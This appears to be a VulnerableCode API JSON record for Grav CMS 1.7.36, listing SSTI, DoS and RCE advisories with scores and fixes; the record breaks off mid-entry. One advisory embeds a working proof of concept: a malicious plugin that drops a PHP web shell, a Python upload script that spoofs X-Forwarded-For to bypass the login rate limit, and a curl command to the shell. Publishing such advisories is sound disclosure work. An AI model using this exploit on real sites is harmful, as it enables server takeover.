Look up vulnerable packages by Package URL (purl).

GET /api/packages/656705?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/656705?format=api",
    "purl": "pkg:composer/getgrav/grav@1.7.36",
    "type": "composer",
    "namespace": "getgrav",
    "name": "grav",
    "version": "1.7.36",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "2.0.0-beta.4",
    "latest_non_vulnerable_version": "2.0.0-rc.2",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47317?format=api",
            "vulnerability_id": "VCID-1ps5-3k43-p3fa",
            "summary": "Server Side Template Injection (SSTI)\nGrav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28117",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00482",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65566",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28117"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28117",
                    "reference_id": "CVE-2024-28117",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28117"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qfv4-q44r-g7rv",
                    "reference_id": "GHSA-qfv4-q44r-g7rv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qfv4-q44r-g7rv"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv",
                    "reference_id": "GHSA-qfv4-q44r-g7rv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.45",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"
                }
            ],
            "aliases": [
                "CVE-2024-28117",
                "GHSA-qfv4-q44r-g7rv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1ps5-3k43-p3fa"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47304?format=api",
            "vulnerability_id": "VCID-4a2z-37a3-2qaw",
            "summary": "Server Side Template Injection (SSTI) via Twig escape handler\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28119",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01406",
                            "scoring_system": "epss",
                            "scoring_elements": "0.80836",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28119"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"
                },
                {
                    "reference_url": "https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"
                        }
                    ],
                    "url": "https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28119",
                    "reference_id": "CVE-2024-28119",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28119"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2m7x-c7px-hp58",
                    "reference_id": "GHSA-2m7x-c7px-hp58",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2m7x-c7px-hp58"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58",
                    "reference_id": "GHSA-2m7x-c7px-hp58",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.45",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"
                }
            ],
            "aliases": [
                "CVE-2024-28119",
                "GHSA-2m7x-c7px-hp58"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4a2z-37a3-2qaw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49312?format=api",
            "vulnerability_id": "VCID-5kr2-3ywy-9kcn",
            "summary": "Grav vulnerable to Denial of Service via Improper Input Handling in 'Supported' Parameter\nA Denial of Service (DoS) vulnerability was identified in the **\"Languages\"** submenu of the Grav **admin configuration panel** (`/admin/config/system`). Specifically, the `Supported` parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (`/`) or an XSS test string—it causes a fatal regular expression parsing error on the server.\n\nThis leads to application-wide failure due to the use of the `preg_match()` function with an **improperly constructed regular expression**, resulting in the following error:\n\n`preg_match(): Unknown modifier 'o' File: /system/src/Grav/Common/Language/Language.php line 244`\n\nOnce triggered, the site becomes completely unavailable to all users.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66305",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20497",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66305"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66305",
                    "reference_id": "CVE-2025-66305",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66305"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m8vh-v6r6-w7p6",
                    "reference_id": "GHSA-m8vh-v6r6-w7p6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m8vh-v6r6-w7p6"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6",
                    "reference_id": "GHSA-m8vh-v6r6-w7p6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66305",
                "GHSA-m8vh-v6r6-w7p6"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5kr2-3ywy-9kcn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95067?format=api",
            "vulnerability_id": "VCID-6a4v-d3zb-67cq",
            "summary": "Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature\n### Summary\nAn authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the \"Direct Install\" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server.\n\n### Details\n\nThe vulnerability exists in the handling of the directInstall task within the Admin plugin and the Grav Package Manager (GPM) core.\n\n-    Vulnerable Endpoints: /admin/tools/direct-install\n-   Vulnerable Logic: AdminController.php (lines 1247-1295) and Gpm.php (lines 214-285).\n-    Root Cause: The function Installer::install() (called in Gpm.php:291) extracts the contents of the ZIP file directly into the /user/\n\nplugins/ or /user/themes/ directories without validating the file extensions or the content of the files inside the archive.\n\n### PoC\n1. Prepare the Malicious Plugin\n\nCreate a directory named shellplugin and add the following files:\n\nshellplugin.php:\n```\n\n<?php\nnamespace Grav\\Plugin;\nuse Grav\\Common\\Plugin;\n\nclass ShellpluginPlugin extends Plugin {\n    public static function getSubscribedEvents(): array {\n        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];\n    }\n    public function onPluginsInitialized(): void {\n        $shell_path = GRAV_ROOT . '/shell.php';\n        if (!file_exists($shell_path)) {\n            file_put_contents($shell_path, '<?php system($_GET[\"cmd\"]); ?>');\n        }\n    }\n}\n\n```\n(Also include a basic blueprints.yaml and shellplugin.yaml as per Grav standards).\n\n2. Create the ZIP Archive\n```\n`zip -r /tmp/shellplugin.zip shellplugin/`\n\n3. 
Execute the Exploit Script\nRun the following Python script to automate the login, nonce retrieval, and malicious upload process:\n\n`import requests, re, json\n\n\ns = requests.Session()\nBASE_URL = 'http://127.0.0.1'\n```\n\n#### 1. Login and Bypass Rate Limit via X-Forwarded-For\n```\nr = s.get(f'{BASE_URL}/admin')\nnonce = re.search(r'name=\"login-nonce\" value=\"([^\"]+)\"', r.text).group(1)\n\nr2 = s.post(f'{BASE_URL}/admin',\n    headers={'X-Forwarded-For': '10.0.0.3'},\n    data={'data[username]': 'admin', 'data[password]': 'admin_password_here', 'task': 'login', 'login-nonce': nonce},\n    allow_redirects=False)\n\nredirect = json.loads(r2.text)['redirect']\ns.get(redirect)\nprint(f\"[+] Logged in successfully.\")\n\n```\n####  2. Extract Admin Nonce from Tools Page\n```\ntools = s.get(f'{BASE_URL}/admin/tools/direct-install')\nadmin_nonce = re.search(r'admin-nonce.*?value=\"([a-f0-9]{32})\"', tools.text).group(1)\nprint(f\"[+] Retrieved Admin Nonce: {admin_nonce}\")\n```\n\n####  3. Upload and Execute\n```\nwith open('/tmp/shellplugin.zip', 'rb') as f:\n    zip_data = f.read()\n\nresp = s.post(f'{BASE_URL}/admin/tools/direct-install',\n    data={'task': 'directInstall', 'admin-nonce': admin_nonce},\n    files={'uploaded_file': ('shellplugin.zip', zip_data, 'application/zip')},\n    headers={'X-Forwarded-For': '10.0.0.3'}\n)\n\nif \"installation\" in resp.text.lower():\n    print(\"[+] Plugin installed successfully!\")\n    # Trigger the shell\n    s.get(BASE_URL) \n    print(f\"[+] RCE Check: {BASE_URL}/shell.php?cmd=id\")`\n```\n    \n####  4. 
Verification\nAccess the dropped shell to confirm command execution:\n`curl -s \"http://127.0.0.1/shell.php?cmd=whoami\"`\n\n<img width=\"2547\" height=\"756\" alt=\"resim (2)\" src=\"https://github.com/user-attachments/assets/6a8c25f1-9a9d-469f-ab68-3c7007e446d4\" />\n\n<img width=\"898\" height=\"89\" alt=\"resim (3)\" src=\"https://github.com/user-attachments/assets/ec097785-1196-47a4-b24e-82fcbf0f7520\" />\n\n\n### Impact\n\n- Vulnerability Type: Remote Code Execution (RCE) / Path Traversal (via extraction).\n- Who is impacted: Any Grav installation where the Admin plugin is enabled and an attacker has gained administrative access (or an administrator is tricked into uploading a malicious ZIP).\n- Severity: Critical. Although it requires admin privileges, the ability to gain full server control (system-level access) makes this a high-impact finding, especially in multi-user environments or via CSRF/Session hijacking.\n\n## Maintainer note — partial fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — ships in **2.0.0-beta.2**.\n\n**What changed (path layer):** `Installer::unZip` now pre-validates every entry name before calling `ZipArchive::extractTo`, and aborts the install if any entry looks like a Zip Slip primitive — `..` path segments, absolute paths (Unix `/…` or Windows `C:\\…`/`\\…`), or NUL bytes. A crafted ZIP can no longer write files outside the target `user/plugins/<slug>` or `user/themes/<slug>` directory.\n\n**Explicit scope limitation:** the \"well-formed but malicious plugin code\" angle of the PoC — uploading a plugin whose own PHP is the payload — is **not** addressed by this change. `directInstall` is an administrator-only operation whose explicit purpose is to install arbitrary PHP; defending against it would require a plugin-signing or marketplace-allowlist feature, which is a separate roadmap item. 
 Administrators should only install plugins from trusted sources. This is now explicitly documented in the commit note. The PoC additionally sets an `X-Forwarded-For` header to get past the admin login rate limit; if that limiter keys on the client-supplied header rather than the connecting address, it is a separate hardening item that this change does not touch.\n\n**Files:**\n- [`system/src/Grav/Common/GPM/Installer.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/GPM/Installer.php) — new `isSafeArchiveEntry()` helper + pre-extract validation loop.\n- [`tests/unit/Grav/Common/Security/ZipSlipSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/ZipSlipSecurityTest.php) — 21 cases covering Unix/Windows/URL-encoded traversal primitives and legitimate plugin names.\n\n---\n\n### Acknowledgements\nThe issue was identified by Security Researcher **Mustafa Murat Akgül**.\n\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42607",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00455",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64206",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42607"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:46:17Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
